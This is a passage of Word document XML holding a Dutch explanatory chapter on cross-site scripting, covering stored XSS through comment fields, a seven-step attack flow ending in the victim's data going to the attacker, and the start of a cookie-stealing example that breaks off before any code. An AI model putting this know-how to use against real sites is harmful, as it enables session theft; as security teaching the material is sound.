      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t xml:space="preserve">-side code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t xml:space="preserve"> aanval waarin de aanvaller</w:t>
      </w:r>
      <w:r w:rsidR="00395AA9">
        <w:t>/hacker</w:t>
      </w:r>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t xml:space="preserve"> kwaad</w:t>
      </w:r>
      <w:r w:rsidR="00F029D6">
        <w:t>aardige scripts uitvoert op web</w:t>
      </w:r>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t>applicaties.</w:t>
      </w:r>
      <w:r w:rsidR="00DA2358">
        <w:t xml:space="preserve"> XSS wordt uitvoert in verschillende programmeertalen, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DA2358">
        <w:t>VBScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DA2358">
        <w:t>, ActiveX, maar de meest misbruikte programmeertaal is Javascript. De primaire reden hiervoor is omdat de meeste webbrowsers afhankelijk zijn van Javascript</w:t>
      </w:r>
      <w:r w:rsidR="00261E66">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A7C7F">
        <w:t xml:space="preserve"> XSS is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A7C7F">
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A7C7F">
        <w:t xml:space="preserve"> van de meeste voorkomende web kwetsbaarheden en </w:t>
      </w:r>
      <w:r w:rsidR="00F029D6">
        <w:t xml:space="preserve">doet zich voor als een webapplicatie </w:t>
      </w:r>
      <w:r w:rsidR="00984C98">
        <w:t>gebruikt maakt van ongecodeerde en niet gevalideerde gebruikersinput in de output dat het genereerd.</w:t>
      </w:r>
      <w:r w:rsidR="00395AA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA14EC5" w14:textId="0A8F20E0" w:rsidR="00A6274F" w:rsidRDefault="00A6274F" w:rsidP="00A6274F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E19457A" wp14:editId="4C42AB21">
            <wp:extent cx="4694327" cy="662997"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="458" name="Afbeelding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xss-voorbeeld.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4694327" cy="662997"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7451EF" w14:textId="69DDD9B2" w:rsidR="00A6274F" w:rsidRDefault="00A6274F" w:rsidP="00A6274F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4FD47" w14:textId="518D4B55" w:rsidR="00383DA8" w:rsidRDefault="00395AA9" w:rsidP="000A19F4">
      <w:r>
        <w:t xml:space="preserve">Voor het verrichten van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS aanval</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> moet de aanvaller/hacker een stukje javascript code plaatsen op de content pagina van een webapplicatie die de slachtoffer</w:t>
      </w:r>
      <w:r w:rsidR="00A56F49">
        <w:t xml:space="preserve"> vervolgens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bezoekt. </w:t>
      </w:r>
      <w:r w:rsidR="003D7F9D">
        <w:t xml:space="preserve">De aanvaller/hacker moet ervoor zorgen </w:t>
      </w:r>
      <w:r w:rsidR="00F623F1">
        <w:t xml:space="preserve">de webbrowser van </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="00F623F1">
        <w:t xml:space="preserve"> slachtoffer de javascript code runt. </w:t>
      </w:r>
      <w:r w:rsidR="000E70C1">
        <w:t xml:space="preserve">De aanvaller/hacker kan dat op twee manieren doen, door </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E70C1">
        <w:t>social</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E70C1">
        <w:t xml:space="preserve"> enginering technieken te gebruiken om </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="000E70C1">
        <w:t xml:space="preserve"> slachtoffer te overtuigen om de geïnfecteerde webpagina te bezoeken. </w:t>
      </w:r>
      <w:r w:rsidR="001D4168">
        <w:t>Een ander manier is om e</w:t>
      </w:r>
      <w:r w:rsidR="00917FAF">
        <w:t>en veel bezochte website, die gebruikers de functie geeft om zelf content te plaatsen zoals opmerking</w:t>
      </w:r>
      <w:r w:rsidR="000E646B">
        <w:t>en(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E646B">
        <w:t>comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E646B">
        <w:t xml:space="preserve">), te infecteren met een </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>XSS-injectie</w:t>
      </w:r>
      <w:r w:rsidR="000E646B">
        <w:t xml:space="preserve"> doormiddel van het plaatsen van een opmerking.</w:t>
      </w:r>
      <w:r w:rsidR="000C5262">
        <w:t xml:space="preserve"> De aanvaller/hacker hoeft alleen nog maar te wachten totdat de niets vermoedende gebruikers de website bezoeken. </w:t>
      </w:r>
      <w:r w:rsidR="000A19F4">
        <w:t xml:space="preserve">In figuur 3.4 wordt een voorbeeld gegeven hoe een </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>HTML-script</w:t>
      </w:r>
      <w:r w:rsidR="000A19F4">
        <w:t xml:space="preserve"> wordt uitgeprint op een webpagina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E182F5A" w14:textId="3B32675F" w:rsidR="000A19F4" w:rsidRDefault="002541DE" w:rsidP="000A19F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E666B54" wp14:editId="604504F7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>114935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5554133" cy="491067"/>
                <wp:effectExtent l="0" t="0" r="27940" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="450" name="Rechthoek 450"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5554133" cy="491067"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525"/>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="438B81CB" w14:textId="7A35B497" w:rsidR="00CE4BB5" w:rsidRPr="00500E88" w:rsidRDefault="00CE4BB5" w:rsidP="00500E88">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00500E88">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Cross-site </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00500E88">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>scripting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666B54" id="Rechthoek 450" o:spid="_x0000_s1044" style="position:absolute;left:0;text-align:left;margin-left:9.05pt;margin-top:.95pt;width:437.35pt;height:38.65pt;z-index:251725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uCWpYCAACIBQAADgAAAGRycy9lMm9Eb2MueG1srFRbT9swFH6ftP9g+X0kKQ2sFSmqQEyTGFTA&#10;xLPr2E2E4+PZbpPu1+/YSUPHJh6mvSTnfvN3zsVl1yiyE9bVoAuanaSUCM2hrPWmoN+fbj59psR5&#10;pkumQIuC7oWjl4uPHy5aMxcTqECVwhIMot28NQWtvDfzJHG8Eg1zJ2CERqUE2zCPrN0kpWUtRm9U&#10;MknTs6QFWxoLXDiH0uteSRcxvpSC+3spnfBEFRRr8/Fr43cdvsnigs03lpmq5kMZ7B+qaFitMekY&#10;6pp5Rra2/iNUU3MLDqQ/4dAkIGXNRewBu8nSN908VsyI2AsOx5lxTO7/heV3u5UldVnQaY7z0azB&#10;R3oQvPIViBcShDii1rg5Wj6alR04h2Tot5O2CX/shHRxrPtxrKLzhKMwz/NpdnpKCUfddJalZ+ch&#10;aPLqbazzXwQ0JBAFtfhscZpsd+t8b3owCckcqLq8qZWKTICKuFKW7Bg+8nqTRVe1bb5B2ctmeZrG&#10;PjBlRFYwjwX8Fklp0hZ0lk/yWF5oum8zUn6vRMin9IOQODFsbBIzjRH7ZOVLNnQXLYOLxFJHp768&#10;N07KH5wG2+AmIn5Hx/T9bKN1zAjaj45NrcG+7yx7e5zJUa+B9N26i/DIYoFBtIZyj5ix0C+TM/ym&#10;xme7Zc6vmMXtQRzhRfD3+JEKcKQwUJRUYH/+TR7sEdSopaTFbSyo+7FlVlCivmqE+yybTsP6Rmaa&#10;n0+Qscea9bFGb5srQCxkeHsMj2Sw9+pASgvNMx6OZciKKqY55i4o9/bAXPn+SuDp4WK5jGa4sob5&#10;W/1oeAgeBh1g+dQ9M2sG7HpE/R0cNpfN30C4tw2eGpZbD7KO+H6d6/AEuO4RoMNpCvfkmI9Wrwd0&#10;8QsAAP//AwBQSwMEFAAGAAgAAAAhAON3CMHZAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FP&#10;hDAQhe8m/odmTLy5ZUlUQMpGSfYHuGrisdCREtspoV1Af73jSU+Tl/fy5nv1YfNOLDjHMZCC/S4D&#10;gdQHM9Kg4PXleFOAiEmT0S4QKvjCCIfm8qLWlQkrPeNySoPgEoqVVmBTmiopY2/R67gLExJ7H2H2&#10;OrGcB2lmvXK5dzLPsjvp9Uj8weoJW4v95+nsFbTWBH28zb/T0K12eW/frH9ySl1fbY8PIBJu6S8M&#10;v/iMDg0zdeFMJgrHuthzkm8Jgu2izHlJp+C+zEE2tfzP3/wAAAD//wMAUEsBAi0AFAAGAAgAAAAh&#10;AOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAU&#10;AAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAU&#10;AAYACAAAACEAlruCWpYCAACIBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEA43cIwdkAAAAHAQAADwAAAAAAAAAAAAAAAADuBAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAPQFAAAAAA==&#10;" fillcolor="#f2f2f2 [3052]" strokecolor="black [3200]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="438B81CB" w14:textId="7A35B497" w:rsidR="00CE4BB5" w:rsidRPr="00500E88" w:rsidRDefault="00CE4BB5" w:rsidP="00500E88">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00500E88">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Cross-site </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00500E88">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>scripting</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C44A7E" w14:textId="4394FFD1" w:rsidR="00484245" w:rsidRDefault="002541DE" w:rsidP="000A19F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7361C48B" wp14:editId="1E626682">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>107315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5545455" cy="3684270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="456" name="Afbeelding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xss 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5455" cy="368427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728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D462149" wp14:editId="61D2A97C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3980603</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5545455" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="459" name="Tekstvak 459"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5545455" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7A8EB1B8" w14:textId="4164378C" w:rsidR="00CE4BB5" w:rsidRPr="00113DF9" w:rsidRDefault="00CE4BB5" w:rsidP="00A71C98">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Figuur 3.5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62149" id="Tekstvak 459" o:spid="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:313.45pt;width:436.65pt;height:21.2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tgjYCAABsBAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EUOnaiFAxKqZJqK0E&#10;U5+N4xCrts+zDQn79Ts7Ce26PU0Tkjnfnc/+vu8u87tWK3ISzkswBZ2MxpQIw6GU5lDQ77v1pxtK&#10;fGCmZAqMKOhZeHq3+Phh3thcTKEGVQpHsIjxeWMLWodg8yzzvBaa+RFYYTBYgdMs4NYdstKxBqtr&#10;lU3H4+usAVdaB1x4j977LkgXqX5VCR4eq8qLQFRB8W0hrS6t+7hmiznLD47ZWvL+GewfXqGZNHjp&#10;pdQ9C4wcnfyjlJbcgYcqjDjoDKpKcpEwIJrJ+B2abc2sSFiQHG8vNPn/V5Y/nJ4ckWVBr2a3lBim&#10;UaSdePHhxF5I9CFDjfU5Jm4tpob2C7So9OD36IzA28rp+I+QCMaR6/OFX9EGwtE5m13hb0YJx9j0&#10;+vbm8yyWyV5PW+fDVwGaRKOgDvVLtLLTxocudUiJl3lQslxLpeImBlbKkRNDrZtaBtEX/y1LmZhr&#10;IJ7qCkZPFiF2UKIV2n2bSJlMB5x7KM8I30HXQt7ytcQLN8yHJ+awZxAxzkF4xKVS0BQUeouSGtzP&#10;v/ljPkqJUUoa7MGC+h9H5gQl6ptBkWPDDoYbjP1gmKNeAUKd4IRZnkw84IIazMqBfsbxWMZbMMQM&#10;x7sKGgZzFbpJwPHiYrlMSdiWloWN2VoeSw/E7tpn5mwvS0BBH2DoTpa/U6fLTfrY5TEg1Um6SGzH&#10;Ys83tnQSvx+/ODNv9ynr9SOx+AUAAP//AwBQSwMEFAAGAAgAAAAhAPXnWQHgAAAACAEAAA8AAABk&#10;cnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFxQ69BEpg1xqqqCA1wqQi+9uck2DsTryHba8PeY&#10;UznOzmrmTbGeTM/O6HxnScLjPAGGVNumo1bC/vN1tgTmg6JG9ZZQwg96WJe3N4XKG3uhDzxXoWUx&#10;hHyuJOgQhpxzX2s0ys/tgBS9k3VGhShdyxunLjHc9HyRJIIb1VFs0GrArcb6uxqNhF122OmH8fTy&#10;vslS97Yft+KrraS8v5s2z8ACTuH6DH/4ER3KyHS0IzWe9RLikCBBLMQKWLSXT2kK7BgvYpUBLwv+&#10;f0D5CwAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAM/2rYI2AgAAbAQAAA4AAAAAAAAAAAAA&#10;AAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAPXnWQHgAAAACAEAAA8AAAAAAAAA&#10;AAAAAAAAjgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACbBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7A8EB1B8" w14:textId="4164378C" w:rsidR="00CE4BB5" w:rsidRPr="00113DF9" w:rsidRDefault="00CE4BB5" w:rsidP="00A71C98">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figuur 3.5 </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403FAFC" w14:textId="6879B722" w:rsidR="00E57EB8" w:rsidRDefault="00B47C4E" w:rsidP="00974BBE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In figuur 3.5 wordt de uitvoering van een simpele maar effectieve </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>XSS-aanval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ge</w:t>
      </w:r>
      <w:r w:rsidR="000A0452">
        <w:t xml:space="preserve">ïllustreerd. Er moet nog wel wat meer voor- en nawerk verricht worden om het rendabel te maken. </w:t>
      </w:r>
      <w:r w:rsidR="006E36B0">
        <w:t xml:space="preserve">De zeven stappen die ondernomen moeten worden </w:t>
      </w:r>
      <w:r w:rsidR="00E57EB8">
        <w:t>zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30049471" w14:textId="7FA38E7B" w:rsidR="00256400" w:rsidRDefault="00A61812" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> De aanva</w:t>
      </w:r>
      <w:r w:rsidR="004E3576">
        <w:t>ller/hacker injecteert een kwaadaardige javascript code op de website</w:t>
      </w:r>
      <w:r w:rsidR="00256400">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="0033566B">
        <w:t>reactie</w:t>
      </w:r>
      <w:r w:rsidR="00256400">
        <w:t xml:space="preserve"> pagina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCF9C3" w14:textId="69893617" w:rsidR="00B46A55" w:rsidRDefault="00B46A55" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De server verwerkt de reactie en slaat het op in de database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECF07D" w14:textId="0B875C8C" w:rsidR="00B46A55" w:rsidRDefault="005265E2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De gebruiker </w:t>
      </w:r>
      <w:r w:rsidR="00A67F3B">
        <w:t xml:space="preserve">bezoek </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>dezelfde</w:t>
      </w:r>
      <w:r w:rsidR="00A67F3B">
        <w:t xml:space="preserve"> reactie pagina</w:t>
      </w:r>
      <w:r w:rsidR="00FB7A50">
        <w:t xml:space="preserve"> via zijn </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>webbrowser en</w:t>
      </w:r>
      <w:r w:rsidR="00A67F3B">
        <w:t xml:space="preserve"> maakt zichzelf hierdoor slachtoffer van de hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A21C194" w14:textId="2C8E0AB4" w:rsidR="00FB7A50" w:rsidRDefault="00FB7A50" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser doet een aanvraag voor de webpagina op verzoek van de gebruiker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B948951" w14:textId="0CE91AB9" w:rsidR="00FB7A50" w:rsidRDefault="00FB7A50" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De server geeft de webpagina met alle reactie plus de reactie van de hacker terug aan de webbrowser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2EFD7" w14:textId="107A424E" w:rsidR="00FB7A50" w:rsidRDefault="003C09BD" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser runt de javascript code die het op de webpagina heeft gevonden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588B694" w14:textId="31EB48B5" w:rsidR="00F57C43" w:rsidRDefault="00F57C43" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser stuurt de data van de niets vermoedende gebruiker naar de hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA764C" w14:textId="6740D8A4" w:rsidR="00DD6326" w:rsidRDefault="0080491F" w:rsidP="00DD6326">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="002C3F9F">
        <w:t xml:space="preserve">oorbeeld van een </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>XSS-aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F3E6C" w14:textId="18A78C89" w:rsidR="00AC1C7C" w:rsidRDefault="00442B7E" w:rsidP="00DD6326">
      <w:r>
        <w:t xml:space="preserve">De anatomie van een </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>XSS-aanval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bestaat uit een webapplicatie waarop ongecodeerde en niet gevalideerde gebruikers input geplaats</w:t>
      </w:r>
      <w:r w:rsidR="0044190B">
        <w:t xml:space="preserve"> kan worden en een webbrowser die het de programmeertaal javascrip</w:t>
      </w:r>
      <w:r w:rsidR="003C3176">
        <w:t>t kan interpreteren en runnen.</w:t>
      </w:r>
      <w:r w:rsidR="00F57C43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931F7EA" w14:textId="10CDCEA1" w:rsidR="00E4022E" w:rsidRDefault="001B1B66" w:rsidP="00DD6326">
      <w:r>
        <w:t xml:space="preserve">Ik zal zoals bij de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C08C0">
        <w:t xml:space="preserve"> een case aantonen hoe schadelijk XSS kan zijn voor gebruikers.</w:t>
      </w:r>
      <w:r w:rsidR="00AD0B9B">
        <w:t xml:space="preserve"> In deze case zal de hacker een cookie stelen met waardevolle data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029E2A1" w14:textId="62EB72D4" w:rsidR="003017D9" w:rsidRDefault="003017D9" w:rsidP="00DD6326">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Simpele cookie steler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB68110" w14:textId="688EA75C" w:rsidR="005B6948" w:rsidRDefault="007D38F7" w:rsidP="00DD6326">
      <w:r>
        <w:t xml:space="preserve">In dit voorbeeld wordt er een </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>XSS-aanval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via de adresbalk uitgevoerd. </w:t>
      </w:r>
      <w:r w:rsidR="002B2328">
        <w:t xml:space="preserve">De website vraagt om de </w:t>
      </w:r>
      <w:r w:rsidR="005B6948">
        <w:t xml:space="preserve">gebruikersnaam (username) </w:t>
      </w:r>
      <w:r w:rsidR="002B2328">
        <w:t>van een gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="005B6948">
        <w:t xml:space="preserve"> zodat </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>het op</w:t>
      </w:r>
      <w:r w:rsidR="005B6948">
        <w:t xml:space="preserve"> de website kan worden uitgeprint</w:t>
      </w:r>
      <w:r w:rsidR="00437832">
        <w:t xml:space="preserve"> als </w:t>
      </w:r>
